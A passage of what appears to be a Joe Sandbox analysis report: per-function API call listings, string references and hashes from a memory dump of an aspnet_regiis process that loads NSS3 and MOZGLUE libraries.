Part of subcall function 6C4095C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C3E7F4A,00000000,?,00000000,00000000), ref: 6C4095E0
Part of subcall function 6C4095C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C3E7F4A,00000000,?,00000000,00000000), ref: 6C4095F5
Part of subcall function 6C4095C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C409609
Part of subcall function 6C4095C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C40961D
Part of subcall function 6C4095C0: PK11_GetInternalSlot.NSS3 ref: 6C40970B
Part of subcall function 6C4095C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C409756
Part of subcall function 6C4095C0: PK11_GetIVLength.NSS3(?), ref: 6C409767
Part of subcall function 6C4095C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C40977E
Part of subcall function 6C4095C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C40978E

Strings

*,Cl, xrefs: 6C430DCC
-$Cl, xrefs: 6C430C64
*,Cl, xrefs: 6C430C69, 6C430DE0, 6C430C80, 6C430C8B, 6C430CAF

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,Cl$*,Cl$-$Cl
API String ID: 3136566230-3380024720
Opcode ID: e9cf01da71a41c8b81b14a60b2cc13186e5cd204311e8659a8a849f033e2009d
Instruction ID: 0a9bfaca781c376e2d964176bd47b1fa9cbad45eec25d0c2e00f18dafe9dcbe7
Opcode Fuzzy Hash: e9cf01da71a41c8b81b14a60b2cc13186e5cd204311e8659a8a849f033e2009d
Instruction Fuzzy Hash: 5041C0B1901255ABEB01DF65DC45FAF7AB4EF88309F100128E91957B41E735EA14CBE2

Function 6C426CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C4F1DE0,?), ref: 6C426CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C426D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C426D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C426D82
DER_GetInteger_Util.NSS3(?), ref: 6C426DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C426DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C426E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C426F19
PK11_DigestBegin.NSS3(00000000), ref: 6C426F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C426F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C427011
PK11_FreeSymKey.NSS3(00000000), ref: 6C427033
free.MOZGLUE(?), ref: 6C42703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C427060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C427087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C4270AF

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: fce4e3690660acde3b316c70fecf8a19d6f0b9b4d615ade655a6c84e5eccffb6
Instruction ID: 026a86c7bdfc214f64ab17bf7fc1291663b83e37adb380d8a86324ec4e8a184d
Opcode Fuzzy Hash: fce4e3690660acde3b316c70fecf8a19d6f0b9b4d615ade655a6c84e5eccffb6
Instruction Fuzzy Hash: 67A1E5719182009BEB10DB24DC87FEA72A5EB8130DF25493DE958CBB81E77DD8498793

Function 6C3EAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EAF39
PR_Unlock.NSS3(?,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EAF69
TlsGetValue.KERNEL32 ref: 6C3EB06B
EnterCriticalSection.KERNEL32(?), ref: 6C3EB083
PR_Unlock.NSS3(?), ref: 6C3EB0A4
TlsGetValue.KERNEL32 ref: 6C3EB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C3EB0D9
PR_Unlock.NSS3 ref: 6C3EB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3EB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3EB182

Part of subcall function 6C41FAB0: free.MOZGLUE(?,-00000001,?,?,6C3BF673,00000000,00000000), ref: 6C41FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C3EB177

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C3CAB95,00000000,?,00000000,00000000,00000000), ref: 6C3EB1C2

Part of subcall function 6C411560: TlsGetValue.KERNEL32(00000000,?,6C3E0844,?), ref: 6C41157A
Part of subcall function 6C411560: EnterCriticalSection.KERNEL32(?,?,?,6C3E0844,?), ref: 6C41158F
Part of subcall function 6C411560: PR_Unlock.NSS3(?,?,?,?,6C3E0844,?), ref: 6C4115B2

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: d889eae3ebb8a9d1fa9d747e6fce5ebb0da1906c5f5bf15c82b8129708ffc443
Instruction ID: e014409f0da98dc332880549a333d16834355dbc79e29f3f144ff315df139567
Opcode Fuzzy Hash: d889eae3ebb8a9d1fa9d747e6fce5ebb0da1906c5f5bf15c82b8129708ffc443
Instruction Fuzzy Hash: 24A1C0B1D002059BEF019F64DC41AEEBBB4AF0931CF154129E805ABB11E732E959CFE6

Function 6C3E2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?>l,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23,?), ref: 6C3E2C62
EnterCriticalSection.KERNEL32(0000001C,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23,?), ref: 6C3E2C76
PL_HashTableLookup.NSS3(00000000,?,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23,?), ref: 6C3E2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23,?), ref: 6C3E2C93

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23,?), ref: 6C3E2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23,?), ref: 6C3E2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C3DE477,?,?,?,00000001,00000000,?,?,6C3E3F23), ref: 6C3E2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C3DE477,?,?,?,00000001,00000000,?), ref: 6C3E2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C3DE477,?,?,?,00000001,00000000,?), ref: 6C3E2D4D
EnterCriticalSection.KERNEL32(?), ref: 6C3E2D61
PL_HashTableLookup.NSS3(?,?), ref: 6C3E2D71
PR_Unlock.NSS3(?), ref: 6C3E2D7E

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

Strings

#?>l, xrefs: 6C3E2C43

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?>l
API String ID: 2446853827-3107277679
Opcode ID: 408b78ac398165effab18a3331de67a0aacaf0bc4b9ddf2d041867bcabf2d82d
Instruction ID: 533536d685b9f1d270a602b3ff34c4a363337db5a0fde0a671da546d4976848f
Opcode Fuzzy Hash: 408b78ac398165effab18a3331de67a0aacaf0bc4b9ddf2d041867bcabf2d82d
Instruction Fuzzy Hash: D65106B6D00215ABDB00AF24DC858AA7778AF1925CB058521EC599BF11EB33FD54CFE2

Function 6C43AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C43ADB1

Part of subcall function 6C41BE30: SECOID_FindOID_Util.NSS3(6C3D311B,00000000,?,6C3D311B,?), ref: 6C41BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C43ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C43AE08

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C43AE25
PL_FreeArenaPool.NSS3 ref: 6C43AE63
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C43AE4D

Part of subcall function 6C344C70: TlsGetValue.KERNEL32(?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344C97
Part of subcall function 6C344C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CB0
Part of subcall function 6C344C70: PR_Unlock.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C43AE93
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C43AECC
PL_FreeArenaPool.NSS3 ref: 6C43AEDE
PL_FinishArenaPool.NSS3 ref: 6C43AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C43AEF5
PL_FinishArenaPool.NSS3 ref: 6C43AF16

Strings

security, xrefs: 6C43ADEE

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 7b2b56a256beec739197f0dcc2a12be1b2e3c5ad1c6a44a67d5d83c79746761d
Instruction ID: f466d8772105b0bc3b28681b5a7e61e5ef283a180b66415d2cbec6e441f28eb2
Opcode Fuzzy Hash: 7b2b56a256beec739197f0dcc2a12be1b2e3c5ad1c6a44a67d5d83c79746761d
Instruction Fuzzy Hash: CF412AB58C422067EF10DB569C46FAA32B4EF8931DF140529E858D2FC1F739A90886D3

Function 6C4DAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C489890: TlsGetValue.KERNEL32(?,?,?,6C4897EB), ref: 6C48989E

EnterCriticalSection.KERNEL32(?), ref: 6C4DAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C4DAFCE
PR_SetPollableEvent.NSS3(?), ref: 6C4DAFD9
EnterCriticalSection.KERNEL32(?), ref: 6C4DAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C4DB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C4DB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C4DB070
PR_JoinThread.NSS3(?), ref: 6C4DB07B
free.MOZGLUE(?), ref: 6C4DB084
EnterCriticalSection.KERNEL32(?), ref: 6C4DB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C4DB0C4
PR_JoinThread.NSS3(?), ref: 6C4DB0F3
free.MOZGLUE(?), ref: 6C4DB0FC
PR_JoinThread.NSS3(?), ref: 6C4DB137
free.MOZGLUE(?), ref: 6C4DB140

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 93746ec8ccd8f8c03e1a4d09f5242b2c883f36fc76b445b18fa0204615b19c71
Instruction ID: cad50542be4a9d96dc28cc24e4b9306bad8dda5e82ff59559f9007c1f464950b
Opcode Fuzzy Hash: 93746ec8ccd8f8c03e1a4d09f5242b2c883f36fc76b445b18fa0204615b19c71
Instruction Fuzzy Hash: 609139B5901601DFCB01DF14C890D4ABBF1BF4935872A85ADD81A9BB22E732FD46CB91

Function 6C3D8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C3D8E22
EnterCriticalSection.KERNEL32(?), ref: 6C3D8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C3D8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C3D8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C3D8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C3D8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C3D8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C3D8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C3D8F00
free.MOZGLUE(?), ref: 6C3D8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C3D8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C3D8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C3D8F5B
PR_Unlock.NSS3(?), ref: 6C3D8F72
PR_Unlock.NSS3(?), ref: 6C3D8F82

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 1c7158b0a8b291346d42cb4d6cb089c944837a3b439102df90f1a2c11d7d0a07
Instruction ID: d7190b3e9824e273f74ebed3af26f1be3f5d05945c1fa13bf7b5ce59ecc3061b
Opcode Fuzzy Hash: 1c7158b0a8b291346d42cb4d6cb089c944837a3b439102df90f1a2c11d7d0a07
Instruction Fuzzy Hash: 0F51D3B3D012059FD700DF68CC85D6AB7B9EF45358B164529E8089BB00E732FD448BE2

Function 6C3FCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C3FCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C3FCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C3FCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C3FCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C3FCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C3FCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C3FCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C3FCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C3FCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C3FCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C3FCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C3FCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C3FCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C3FD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C3FD021

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 3e5e1f8a05b66e674cb44f34bf82be473437fcebd27b04baedd31578b65740e1
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: C5319671B16A1127EF1D545A6C25FEE184A4B6730EF44043CF94AE6FC0FA869B1702ED

Function 6C4D0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C4D1000

Part of subcall function 6C489BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C3B1A48), ref: 6C489BB3
Part of subcall function 6C489BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C3B1A48), ref: 6C489BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C4D1016

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_Unlock.NSS3(?), ref: 6C4D1021

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C4D1046
PR_Unlock.NSS3(?), ref: 6C4D106B
PR_Lock.NSS3 ref: 6C4D1079
PR_Unlock.NSS3 ref: 6C4D1096
free.MOZGLUE(?), ref: 6C4D10A7
free.MOZGLUE(?), ref: 6C4D10B4
PR_DestroyCondVar.NSS3(?), ref: 6C4D10BF
PR_DestroyCondVar.NSS3(?), ref: 6C4D10CA
PR_DestroyCondVar.NSS3(?), ref: 6C4D10D5
PR_DestroyCondVar.NSS3(?), ref: 6C4D10E0
PR_DestroyLock.NSS3(?), ref: 6C4D10EB
free.MOZGLUE(?), ref: 6C4D1105

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 0795de822159b6f56724128fcef62f40df7acdda9507708ba5f4c65e81747e72
Instruction ID: 5867d271ea20ca939d2051a455c0e151071fef2c953c628e8914aad904a30527
Opcode Fuzzy Hash: 0795de822159b6f56724128fcef62f40df7acdda9507708ba5f4c65e81747e72
Instruction Fuzzy Hash: AA316CB5900501ABDB02EF15EC41E4ABBB1FF11369B194139E80A12F61E772F978DBD2

Function 6C40EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C40EE0B

Part of subcall function 6C420BE0: malloc.MOZGLUE(6C418D2D,?,00000000,?), ref: 6C420BF8
Part of subcall function 6C420BE0: TlsGetValue.KERNEL32(6C418D2D,?,00000000,?), ref: 6C420C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C40EEE1

Part of subcall function 6C401D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C401D7E
Part of subcall function 6C401D50: EnterCriticalSection.KERNEL32(?), ref: 6C401D8E
Part of subcall function 6C401D50: PR_Unlock.NSS3(?), ref: 6C401DD3

TlsGetValue.KERNEL32 ref: 6C40EE51
EnterCriticalSection.KERNEL32(?), ref: 6C40EE65
PR_Unlock.NSS3(?), ref: 6C40EEA2
free.MOZGLUE(?), ref: 6C40EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C40EED0
PR_Unlock.NSS3(?), ref: 6C40EF48
free.MOZGLUE(?), ref: 6C40EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C40EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C40EFA4
free.MOZGLUE(?), ref: 6C40EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C40F055
free.MOZGLUE(?), ref: 6C40F060

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 74334fa409b6f0192e07c60394f5e9657be5439720e83164282f31a9d76ba7ab
Instruction ID: 8c231d67409e7a30979eec9225dd53999816f5967975fa72b4bfd6b8e2ff5c7f
